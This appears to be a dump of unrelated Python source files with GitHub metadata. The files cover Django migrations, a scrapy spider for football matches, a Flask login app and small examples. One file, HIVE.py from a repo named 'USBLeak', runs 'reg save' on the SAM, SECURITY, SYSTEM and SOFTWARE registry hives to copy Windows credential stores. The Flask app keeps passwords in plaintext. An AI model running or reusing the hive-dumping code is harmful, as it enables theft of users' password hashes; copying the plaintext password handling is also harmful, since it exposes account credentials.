'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'social_auth.association': {
'Meta': {'unique_together': "(('server_url', 'handle'),)", 'object_name': 'Association'},
'assoc_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'handle': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issued': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'lifetime': ('django.db.models.fields.IntegerField', [], {}),
'secret': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'server_url': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'social_auth.nonce': {
'Meta': {'unique_together': "(('server_url', 'timestamp', 'salt'),)", 'object_name': 'Nonce'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'salt': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'server_url': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'timestamp': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'})
},
'social_auth.usersocialauth': {
'Meta': {'unique_together': "(('provider', 'uid'),)", 'object_name': 'UserSocialAuth'},
'extra_data': ('social_auth.fields.JSONField', [], {'default': "'{}'"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'uid': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'social_auth'", 'to': "orm['accounts.User']"})
}
}
complete_apps = ['social_auth', 'accounts']
symmetrical = True
|
[
"[email protected]"
] | |
ea05163688d0e2df0f55b6c2fb8a853cba607e6a
|
382882c162554152702876f1232a08e5c4a66bc0
|
/HIVE.py
|
42294b8e9f3f1d4f32e0d64f6f9c25578a5a1f12
|
[] |
no_license
|
inseok1121/USBLeak
|
582094058fb3c16031fdcedd43b7cc420dec9846
|
5f1cadec4dfea058cfad1965d27cbdaf24099a18
|
refs/heads/master
| 2021-01-24T02:11:37.285286 | 2018-02-25T13:39:56 | 2018-02-25T13:39:56 | 122,839,333 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 614 |
py
|
import os
import tempfile
def save_hivefile():
tempdir = tempfile.gettempdir()
comm_sys = createCommand(tempdir, 'system')
comm_soft = createCommand(tempdir, 'software')
comm_sam = createCommand(tempdir, 'sam')
comm_security = createCommand(tempdir, 'security')
os.system(comm_sys)
os.system(comm_soft)
os.system(comm_sam)
os.system(comm_security)
def createCommand(temp, target):
comm = "reg save hklm\\"
comm = comm + target
comm = comm + " "
comm = comm + temp
comm = comm + "\\"
comm = comm + target
comm = comm + " /y"
return comm
|
[
"[email protected]"
] | |
684522cf9c5924d3b28f46f0200a3bcde4a9de5a
|
ec8d7c3176187359c7618bd591724ea93a9b0772
|
/python/projects/bitwise/setup.py
|
181ad28d54774b70681f809e43e5b3987c3f4554
|
[] |
no_license
|
almacro/snippets
|
7000faf593ab97a0890ea56d944ceef4ef23643a
|
e247c5bc26f336add1c7be8636775f841a65615d
|
refs/heads/master
| 2023-08-05T11:00:13.161159 | 2023-07-23T15:31:42 | 2023-07-23T15:31:42 | 65,136,325 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 229 |
py
|
from setuptools import setup, find_packages
setup(
name="bitwise",
version="0.1",
install_requiresr=['nose'],
packages=find_packages(),
package_dir={'':'src'},
scripts=["scripts/bits","scripts/bitmask"]
)
|
[
"[email protected]"
] | |
2a727152d5e0b4186b181651149c07394f82f236
|
7e46361bda7d0912e715a4046a91758da0cfca5d
|
/course/migrations/0019_auto_20200520_1051.py
|
75949cbea454c671e756ad7051ce46c87d391e40
|
[] |
no_license
|
varun560/Learning_Portal
|
dee70c64a54dc7ca1cbfa42debc5941289d0984b
|
9cbac1221a33c54be696d174cff470e7399a28d7
|
refs/heads/main
| 2023-01-21T14:29:27.196241 | 2020-11-25T05:59:47 | 2020-11-25T05:59:47 | 315,658,398 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 800 |
py
|
# Generated by Django 3.0.6 on 2020-05-20 05:21
from django.db import migrations, models
from django.utils import timezone
class Migration(migrations.Migration):
dependencies = [
('course', '0018_assignment'),
]
operations = [
migrations.RemoveField(
model_name='assignment',
name='deadline',
),
migrations.AddField(
model_name='assignment',
name='end_date',
field=models.DateTimeField(default=timezone.now()),
preserve_default=False,
),
migrations.AddField(
model_name='assignment',
name='start_date',
field=models.DateTimeField(auto_now_add=True, default=timezone.now()),
preserve_default=False,
),
]
|
[
"[email protected]"
] | |
573aeb3671f39eb706671112ecd46bc16b3e47ef
|
d1194d9ff416408717470694d913132d6cd5f84b
|
/oneMonthNewsApiExtractor/oneMonther/oneMonther/middlewares.py
|
ff3bb1101f8d18b521928f3ad64c949f3d14c726
|
[] |
no_license
|
bopopescu/pinalpha_mvp
|
c7f5a37e3c2bb7c009c6d0eda9e964346ec6b244
|
928d21cef1b4aa59b7af81d64c592b6f393102f9
|
refs/heads/master
| 2021-10-10T12:54:18.026399 | 2019-01-11T02:54:49 | 2019-01-11T02:54:49 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,908 |
py
|
# -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
class OnemontherSpiderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the spider middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
# Called for each response that goes through the spider
# middleware and into the spider.
# Should return None or raise an exception.
return None
def process_spider_output(self, response, result, spider):
# Called with the results returned from the Spider, after
# it has processed the response.
# Must return an iterable of Request, dict or Item objects.
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
# Called when a spider or process_spider_input() method
# (from other spider middleware) raises an exception.
# Should return either None or an iterable of Response, dict
# or Item objects.
pass
def process_start_requests(self, start_requests, spider):
# Called with the start requests of the spider, and works
# similarly to the process_spider_output() method, except
# that it doesn’t have a response associated.
# Must return only requests (not items).
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
|
[
"[email protected]"
] | |
1308c8f92d220ac7b01c451288da34696bcbe3f8
|
c52ea8af6a4d3c32a0557c39d683a4d01b2188db
|
/ch10_dash_cytoscape_basic/layout/dash_cyto_grid_option_curve_style.py
|
00701dcffe65b44108634f361e1dafb4d3efea61
|
[
"MIT"
] |
permissive
|
plotly-dash-book/plotly-dash-book
|
dcde031766d17adf6fc670c8aec9c8d4e267eeb7
|
cc54f7ac6066a741f733facbd002222a87746e02
|
refs/heads/master
| 2022-06-27T02:46:25.502190 | 2022-06-08T03:21:23 | 2022-06-08T03:21:23 | 197,512,189 | 30 | 18 |
MIT
| 2021-05-31T04:47:36 | 2019-07-18T04:36:50 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,531 |
py
|
import dash
import dash_cytoscape as cyto
import dash_html_components as html
app = dash.Dash(__name__)
# ノードを17個定義
nodes = [{"data": {"id": x, "label": f"{x}"}} for x in range(17)]
# エッジを定義
edges = [
{"data": {"source": 0, "target": 1}},
{"data": {"source": 0, "target": 2}},
{"data": {"source": 0, "target": 3}},
{"data": {"source": 0, "target": 4}},
{"data": {"source": 2, "target": 3}},
{"data": {"source": 3, "target": 4}},
{"data": {"source": 4, "target": 5}},
{"data": {"source": 5, "target": 1}},
{"data": {"source": 1, "target": 6}},
{"data": {"source": 2, "target": 7}},
{"data": {"source": 2, "target": 8}},
{"data": {"source": 3, "target": 9}},
{"data": {"source": 4, "target": 10}},
{"data": {"source": 4, "target": 11}},
{"data": {"source": 4, "target": 12}},
{"data": {"source": 5, "target": 13}},
{"data": {"source": 5, "target": 14}},
{"data": {"source": 6, "target": 15}},
]
elements = nodes + edges
cyto_compo = cyto.Cytoscape(
id="dash_cyto_layout",
style={"width": "400px", "height": "400px"},
layout={"name": "grid", "rows": 3, "columns": 6},
elements=elements,
stylesheet=[
{"selector": "node", "style": {"content": "data(label)"}},
# エッジのカーブのスタイルを曲線にする
{"selector": "edge", "style": {"curve-style": "unbundled-bezier"}},
],
)
app.layout = html.Div([cyto_compo])
if __name__ == "__main__":
app.run_server(debug=True)
|
[
"[email protected]"
] | |
a657cc0c698b514929d0eb92d4cb9c214587f5d4
|
70759e1e5b4dcf94ec3bd3a93bd563b14b8e08ad
|
/tomato.py
|
e16dfe794dd44956edc1b90d0d0a09c636de4702
|
[] |
no_license
|
akaNiknok/tomato-app
|
04b0cc4a41890c5b7108fb43404064f03a0dc60e
|
f6602b7c6d6741f81e518a7134aeab522c07865f
|
refs/heads/master
| 2021-01-10T14:58:21.279375 | 2016-01-02T04:10:22 | 2016-01-02T04:10:22 | 48,598,267 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,613 |
py
|
from flask import Flask, render_template, request, url_for, session, redirect, make_response
import sqlite3
from os import urandom, path
ROOT = path.dirname(path.realpath(__file__))
app = Flask(__name__)
@app.route("/", methods=["GET", "POST"])
def index():
if request.method == "POST":
return redirect("/" + request.form["country"])
if "username" in session:
return render_template("index.html", user=session["username"])
else:
return render_template("index.html")
@app.route("/<country>")
def country(country):
return render_template("country.html", country=country, title=country)
@app.route("/login", methods=["GET", "POST"])
def login():
# Check if the user submitted the login form
if request.method == "POST":
form = request.form
# Connect to the database
db = sqlite3.connect(path.join(ROOT, "database.db"))
# Create a cursor
cursor = db.cursor()
# Get the users password from the `users` table
cursor.execute("SELECT password FROM users WHERE name=?", (form["user"],))
# Check if the password is correct
# If incorrect, throw an error
try:
if cursor.fetchone()[0] != form["pwd"]:
db.close()
return render_template("login.html", error=True)
except TypeError: # Throws a TypeError if the user is not yet registered
db.close()
return render_template("login.html", error=True)
# Else, set `username` in `session` to the `user`
session['username'] = form["user"]
db.close() # Close the connection
return redirect("/")
return render_template("login.html")
@app.route("/logout")
def logout():
session.pop('username', None)
return redirect("/")
@app.route("/register", methods=["GET", "POST"])
def register():
# Check if the user submitted the register form
if request.method == "POST":
form = request.form
# Connect to the database
db = sqlite3.connect(path.join(ROOT, "database.db"))
# Create a cursor
cursor = db.cursor()
# Add the information to the `users` table
cursor.execute("INSERT INTO users(name, email, password) VALUES(?,?,?)", (form["user"], form["email"], form["pwd"]))
db.commit() # Save the changes
db.close() # Close the connection
return redirect("/")
return render_template("register.html")
# Set the super duper secret-ish key :P
app.secret_key = urandom(24)
if __name__=="__main__":
app.run(host="0.0.0.0", debug=True)
|
[
"[email protected]"
] | |
7254429fac5007af3e944345732a89d7e762e82f
|
3bb04e209b3cbd9a392b55f82b373810847cebd3
|
/processing/utils.py
|
c84f3d46927c2e04151aa7d9b8d4c8d91bf2f3d5
|
[
"MIT"
] |
permissive
|
mas2df/racefinder
|
016d60b850c06c31242d3cbf26cf894b6485a816
|
c866523a9b174fa3c2f0a95e4aad242ae8dcd345
|
refs/heads/master
| 2020-12-24T13:28:07.680588 | 2014-10-10T17:58:18 | 2014-10-10T17:58:18 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,913 |
py
|
import re
def getDistanceUnitAndType(value):
pattern = re.compile(ur"(\d+(\.\d+)?)?([KMH])?\s?([\x20-\x7E]+)")
(distance, decimal, unit, type) = re.findall(pattern, value)[0]
return (distance, unit, type)
def getDistanceAndType(value):
(distance, unit, type) = getDistanceUnitAndType(value)
combined = ""
if (distance and unit):
combined = " ".join([distance, unit])
return (combined, type)
states = {
'AK': 'Alaska',
'AL': 'Alabama',
'AR': 'Arkansas',
'AZ': 'Arizona',
'CA': 'California',
'CO': 'Colorado',
'CT': 'Connecticut',
'DC': 'District of Columbia',
'DE': 'Delaware',
'FL': 'Florida',
'GA': 'Georgia',
'GU': 'Guam',
'HI': 'Hawaii',
'IA': 'Iowa',
'ID': 'Idaho',
'IL': 'Illinois',
'IN': 'Indiana',
'KS': 'Kansas',
'KY': 'Kentucky',
'LA': 'Louisiana',
'MA': 'Massachusetts',
'MD': 'Maryland',
'ME': 'Maine',
'MI': 'Michigan',
'MN': 'Minnesota',
'MO': 'Missouri',
'MS': 'Mississippi',
'MT': 'Montana',
'NA': 'National',
'NC': 'North Carolina',
'ND': 'North Dakota',
'NE': 'Nebraska',
'NH': 'New Hampshire',
'NJ': 'New Jersey',
'NM': 'New Mexico',
'NV': 'Nevada',
'NY': 'New York',
'OH': 'Ohio',
'OK': 'Oklahoma',
'OR': 'Oregon',
'PA': 'Pennsylvania',
'PR': 'Puerto Rico',
'RI': 'Rhode Island',
'SC': 'South Carolina',
'SD': 'South Dakota',
'TN': 'Tennessee',
'TX': 'Texas',
'UT': 'Utah',
'VA': 'Virginia',
'VI': 'Virgin Islands',
'VT': 'Vermont',
'WA': 'Washington',
'WI': 'Wisconsin',
'WV': 'West Virginia',
'WY': 'Wyoming'
}
|
[
"[email protected]"
] | |
2f66556113594253cc5a56e9e92b8cca93f1eb80
|
ee43ebd0a06bee2f700e8491e481bf3c5edde9fb
|
/projeto_redacao/urls.py
|
168aea0a9e49ba785312668b688a1f67e66f93a6
|
[] |
no_license
|
heloisaGuimaraes/proofreader
|
c5ed4ec46773cbeab5405a71430bd8f9d60861c2
|
aa7a2d9ec8ea2cff9a89b8a15a2dd2a9a7f385cb
|
refs/heads/master
| 2022-10-19T09:07:25.574371 | 2020-06-12T03:41:23 | 2020-06-12T03:41:23 | 271,701,258 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,024 |
py
|
"""projeto_redacao URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from . import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_ROOT, document_root=settings.MEDIA_ROOT) + static (settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
|
[
"[email protected]"
] | |
8819b9fcfe6bcf3b5c61a314d5b3b7d97b749e79
|
5440e66a6ab273cb75293677fbe3d1fe9267bfe0
|
/check_profanity.py
|
b065ccb4a183d42051ff71bdd36a180e9f85df01
|
[
"Apache-2.0"
] |
permissive
|
qingzhizhu/QingPython
|
f439c51f14c1e4672361e5a7fdc28f2ff01c9a98
|
c6f2258caf2edab4c8f5afe5bb2c974f318e50c7
|
refs/heads/master
| 2020-03-24T06:16:06.327547 | 2018-09-21T09:34:57 | 2018-09-21T09:34:57 | 142,522,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 833 |
py
|
#!/usr/bin/python
#coding=utf-8
#desc:检查是否有脏话, python2
#author:[email protected]
import os,sys
import urllib
DIR=os.getcwd()
def check_profanity(text):
connection = urllib.urlopen("http://www.wdylike.appspot.com/?q="+text)
output = connection.read()
print(output)
connection.close()
if "true" in output:
print("Profanity Alert! 有敏感词")
elif "false" in output:
print("OK!this document has no curse words.")
else:
print("Could not scan the document properly.")
def read_text():
quotes = open(DIR+"/movie_quotes.txt")
contents = quotes.read()
#print(contents)
quotes.close()
check_profanity(contents)
if __name__ == "__main__":
# for arg in sys.argv:
# print(arg)
print("file:", sys.argv[0])
for i in range(1, len(sys.argv)):
print("param:", i, sys.argv[i])
read_text()
|
[
"[email protected]"
] | |
a6be9d570514b770b12cd026d69be6ad9174e1eb
|
7c246e0046136c7ab200ebf5a7e8fe772bd0738b
|
/02_django/css01/css/urls.py
|
de2d2f568f2315ed7bcf65c575c4dcfdb29a1fdd
|
[] |
no_license
|
name-chichi/KDT-BigData
|
d6d87557945b6dc5c3dd7126a718f6de147f6d7b
|
6bac43fdaf0b0be94996f2fab65f59916d500395
|
refs/heads/main
| 2023-06-30T07:04:54.296238 | 2021-07-30T03:09:54 | 2021-07-30T03:09:54 | 374,502,002 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 865 |
py
|
"""config URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from css import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.home, name='home'),
path('html5', views.html5, name='html5'),
]
|
[
"[email protected]"
] | |
6c6ea3cf2a17e60d0440efa850fed227e5baec5c
|
8ac3ef229436abdb2a9ae4c428ab1f62148897a3
|
/Vijay_Sir/22-04-2021/Inheritance_constractor_importance.py
|
c5927a5485ce1bbd3b3d5f19bf3a638686d24efb
|
[] |
no_license
|
udayreddy026/pdemo_Python
|
358e01cf6599e1bea3f787e6dfae2d039ee66668
|
6b7272fe205053141ed273ae70beb4358a4071f2
|
refs/heads/main
| 2023-05-01T04:33:40.558187 | 2021-05-14T07:06:20 | 2021-05-14T07:06:20 | 349,928,315 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 329 |
py
|
class A:
y = 20
def __init__(self):
self.x = 30
def m1(self):
self.x = self.x + self.x
A.y = self.x + A.y
class B(A):
# def __init__(self):
# self.x = 40
def m1(self):
A.x = self.x + A.x
# b = B()
# b.m1()
# # b.m1()
# print(A.x)
a = A()
a.m1()
print(A.y, a.x)
|
[
"udayreddy026gmail.com"
] |
udayreddy026gmail.com
|
93adf05fb8e78616581a275936e16a2c12ad1582
|
f82757475ea13965581c2147ff57123b361c5d62
|
/gi-stubs/repository/Clutter/ZoomActionPrivate.py
|
30f46ad6d498ed3b8d07dbaaa947fec7334f3b73
|
[] |
no_license
|
ttys3/pygobject-stubs
|
9b15d1b473db06f47e5ffba5ad0a31d6d1becb57
|
d0e6e93399212aada4386d2ce80344eb9a31db48
|
refs/heads/master
| 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null |
UTF-8
|
Python
| false | false | 4,403 |
py
|
# encoding: utf-8
# module gi.repository.Clutter
# from /usr/lib64/girepository-1.0/Clutter-1.0.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
import gi.overrides.GObject as __gi_overrides_GObject
import gi.repository.Atk as __gi_repository_Atk
import gi.repository.GObject as __gi_repository_GObject
import gobject as __gobject
class ZoomActionPrivate(__gi.Struct):
# no doc
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __dir__(self, *args, **kwargs): # real signature unknown
""" Default dir() implementation. """
pass
def __eq__(self, *args, **kwargs): # real signature unknown
""" Return self==value. """
pass
def __format__(self, *args, **kwargs): # real signature unknown
""" Default object formatter. """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __ge__(self, *args, **kwargs): # real signature unknown
""" Return self>=value. """
pass
def __gt__(self, *args, **kwargs): # real signature unknown
""" Return self>value. """
pass
def __hash__(self, *args, **kwargs): # real signature unknown
""" Return hash(self). """
pass
def __init_subclass__(self, *args, **kwargs): # real signature unknown
"""
This method is called when a class is subclassed.
The default implementation does nothing. It may be
overridden to extend subclasses.
"""
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
def __le__(self, *args, **kwargs): # real signature unknown
""" Return self<=value. """
pass
def __lt__(self, *args, **kwargs): # real signature unknown
""" Return self<value. """
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __ne__(self, *args, **kwargs): # real signature unknown
""" Return self!=value. """
pass
def __reduce_ex__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __sizeof__(self, *args, **kwargs): # real signature unknown
""" Size of object in memory, in bytes. """
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
def __subclasshook__(self, *args, **kwargs): # real signature unknown
"""
Abstract classes can override this to customize issubclass().
This is invoked early on by abc.ABCMeta.__subclasscheck__().
It should return True, False or NotImplemented. If it returns
NotImplemented, the normal algorithm is used. Otherwise, it
overrides the normal algorithm (and the outcome is cached).
"""
pass
def __weakref__(self, *args, **kwargs): # real signature unknown
pass
__class__ = None # (!) real value is "<class 'gi.types.StructMeta'>"
__dict__ = None # (!) real value is "mappingproxy({'__info__': StructInfo(ZoomActionPrivate), '__module__': 'gi.repository.Clutter', '__gtype__': <GType void (4)>, '__dict__': <attribute '__dict__' of 'ZoomActionPrivate' objects>, '__weakref__': <attribute '__weakref__' of 'ZoomActionPrivate' objects>, '__doc__': None})"
__gtype__ = None # (!) real value is '<GType void (4)>'
__info__ = StructInfo(ZoomActionPrivate)
|
[
"[email protected]"
] | |
7cd66ff25eba5bc3b16202ba9e93dccd733556ea
|
13ced67131fc3569e9380a1abf610309450fcafa
|
/yatagarasu/spiders/match.py
|
ade26b2280d76271440b4fa2f8c2e2b1755854ba
|
[
"MIT"
] |
permissive
|
h-mineta/yatagarasu
|
96724e4b0de1041e11cac65ec62700307c932546
|
d5fc2878e3dd26f576c738028d4e3d0f8d5abe5d
|
refs/heads/master
| 2020-03-10T14:24:14.322704 | 2018-04-16T13:36:43 | 2018-04-16T13:36:43 | 129,425,292 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,068 |
py
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 h-mineta <[email protected]>
# This software is released under the MIT License.
#
from yatagarasu.items import MatchItem
import re
import scrapy
import mojimoji
class MatchSpider(scrapy.Spider):
name = 'match'
allowed_domains = [
'www.jleague.jp'
]
start_urls = []
def __init__(self, settings, *args, **kwargs):
super(MatchSpider, self).__init__(*args, **kwargs)
with open(settings.get("START_URLS_MATCH"), 'r') as file:
urls = file.readlines()
for url in urls:
url = url.rstrip("\n")
if url != "\n" and re.match(r"^https?.*", url) != None:
self.start_urls.append(url)
@classmethod
def from_crawler(cls, crawler):
return cls(settings = crawler.settings)
def parse(self, response):
for match_selection in response.xpath('//div[@class="content"]/div[@class="main"]/section[@class="scheduleArea"]/section[@class="contentBlock"]/section[@class="matchlistWrap"]'):
matches = match_selection.xpath('div[@class="timeStamp"]/h4/text()').re('^(\d{4})年(\d{1,2})月(\d{1,2})日')
if matches:
match_date = "{0:d}-{1:02d}-{2:02d}".format(int(matches[0]), int(matches[1]), int(matches[2]))
for match_table in match_selection.xpath('table[@class="matchTable"]/tbody').xpath('tr'):
item = None
try:
url = match_table.xpath('td[contains(@class,"match")]/a/@href').get()
matches = re.match(r'^/match/([\d\w]{2,16})/(\d{4})/(\d{6})/', url)
if matches:
item = MatchItem()
item['url'] = matches.group(0)
item['league'] = matches.group(1)
item['id'] = int(matches.group(2)) * 1000000 + int(matches.group(3))
except Exception as ex:
# ID取得に失敗
continue
match_time = match_table.xpath('td[@class="stadium"]/text()').re_first(r'^(\d{2}:\d{2})')
if match_time:
item['kickoff_date'] = match_date
item['kickoff_time'] = match_time
try:
item['club_id_home'] = match_table.xpath('td[contains(@class,"match")]//td[@class="clubName leftside"]/a/@href').re_first(r'^/club/([^/]+)/')
item['club_id_away'] = match_table.xpath('td[contains(@class,"match")]//td[@class="clubName rightside"]/a/@href').re_first(r'^/club/([^/]+)/')
except Exception as ex:
# ノートが入っており、試合情報ではない場合 次trに進む
continue
item['status'] = None
item['club_point_home'] = None
item['club_point_away'] = None
item['stadium_name'] = mojimoji.zen_to_han(match_table.xpath('td[@class="stadium"]/a/text()').get(), kana=False)
try:
item['club_point_home'] = int(match_table.xpath('td[contains(@class,"match")]//td[@class="point leftside"]/text()').get())
item['club_point_away'] = int(match_table.xpath('td[contains(@class,"match")]//td[@class="point rightside"]/text()').get())
except Exception as ex:
# 試合前として扱う
item['club_point_home'] = None
item['club_point_away'] = None
item['status'] = match_table.xpath('td[contains(@class,"match")]//td[@class="status"]//span/@class').get()
yield item
else:
# 時間未定
continue
|
[
"[email protected]"
] | |
94dc0dfabc4bdc458a90b979dc28da65b91a1a81
|
bfe8a7abec489fbbec72ff5baa2b40e5c104fe88
|
/ 6-Rozsyłanie grupowe UDP/multicastClient.py
|
ce102d39f7d2aa97ef4f5f4f4b6e6adb6e56a285
|
[] |
no_license
|
tobiashiro/Programowanie-Sieciowe
|
d057e927e30c6b51444a10696ecf76ee24d4c15c
|
eac8a105e2597f1f94b01e4d806994ceadc075c3
|
refs/heads/master
| 2023-03-11T18:04:32.027450 | 2021-02-28T21:52:49 | 2021-02-28T21:52:49 | 338,399,853 | 0 | 0 | null | 2021-02-26T21:22:09 | 2021-02-12T18:26:38 |
Python
|
UTF-8
|
Python
| false | false | 2,593 |
py
|
import socket, logging, time
import struct
import sys
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)-9s,) %(message)s',)
class MulticastClient:
def __init__(self):
self.message: str
self.host: str
self.port: int
self.host = ""
self.port = 0
self.multicast_group = (self.host, self.port)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def start_client(self):
try:
logging.debug("Multicast Client start")
time.sleep(0.5)
self.message = bytes(input("Type your Multi-message: ").encode())
self.host = str(input("UDP client IP or domain name (default: 224.3.29.71): "))
if len(self.host) == 0:
self.host = "224.3.29.71"
self.port = input("Listening port (default - 7): ")
if len(self.port) == 0:
self.port = 7
elif self.port.isnumeric():
self.port = int(self.port)
else:
raise Exception("You put incorrect format")
self.multicast_group = ('{}'.format(self.host), self.port)
except Exception as e:
logging.warning("You put incorrect input data. Exepction message: {}".format(e))
sys.exit(1)
logging.debug("If you want to finish - type 'quit' ")
def create_datagram_socket(self):
# Set a timeout so the socket does not block indefinitely when trying
# to receive data.
self.sock.settimeout(0.2)
ttl = struct.pack('b', 1)
self.sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, ttl)
def send_message(self):
try:
# Send data to the multicast group
logging.debug("Sending message to multicast: {}".format(self.message))
self.sock.sendto(self.message, self.multicast_group)
# Look for responses from all recipients
while True:
logging.debug("waiting to recive")
try:
data, server = self.sock.recvfrom(16)
except socket.timeout:
logging.debug('timed out, no more responses')
break
else:
logging.debug("received {} from {}".format(data, server))
finally:
logging.debug("closing socket")
self.sock.close()
def run(self, event):
event.wait()
self.start_client()
self.create_datagram_socket()
self.send_message()
|
[
"[email protected]"
] | |
49b7c6233cb3d031e79f2710167aae956de76e29
|
55a281d728541773e6eda896599c0cc48dfe5156
|
/Advanced/venv/Scripts/easy_install-script.py
|
8e473e4d78117e10d75b080582317f8367fd492a
|
[] |
no_license
|
dhariskov/python-advanced
|
c0bebd937f3849dd62ae2834cbdf9f8100b2bb56
|
4725070c960d3c234ed2f20ff2156e2f89514a02
|
refs/heads/master
| 2022-12-04T22:40:18.485552 | 2020-08-28T08:29:25 | 2020-08-28T08:29:25 | 288,775,775 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 450 |
py
|
#!C:\Users\Acer\PycharmProjects\Advanced\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
|
[
"[email protected]"
] | |
6cf4548fab5f9a425ac47424c3ec0ab24bf069e9
|
91f023d744710386c6d2baec138e4a2496ee8969
|
/manage.py
|
85e5b0dc70f6f69c6dcd5778870b199d2b3aec53
|
[] |
no_license
|
miquel-corral/crppdmt
|
4ae653393e26a55175a5a4f05950a44b262bfc93
|
a44088a4476fca96891733a243de414be5952bb0
|
refs/heads/master
| 2020-05-05T13:13:31.121093 | 2015-11-02T15:08:23 | 2015-11-02T15:08:23 | 34,043,005 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 250 |
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "crppdmt.settings")
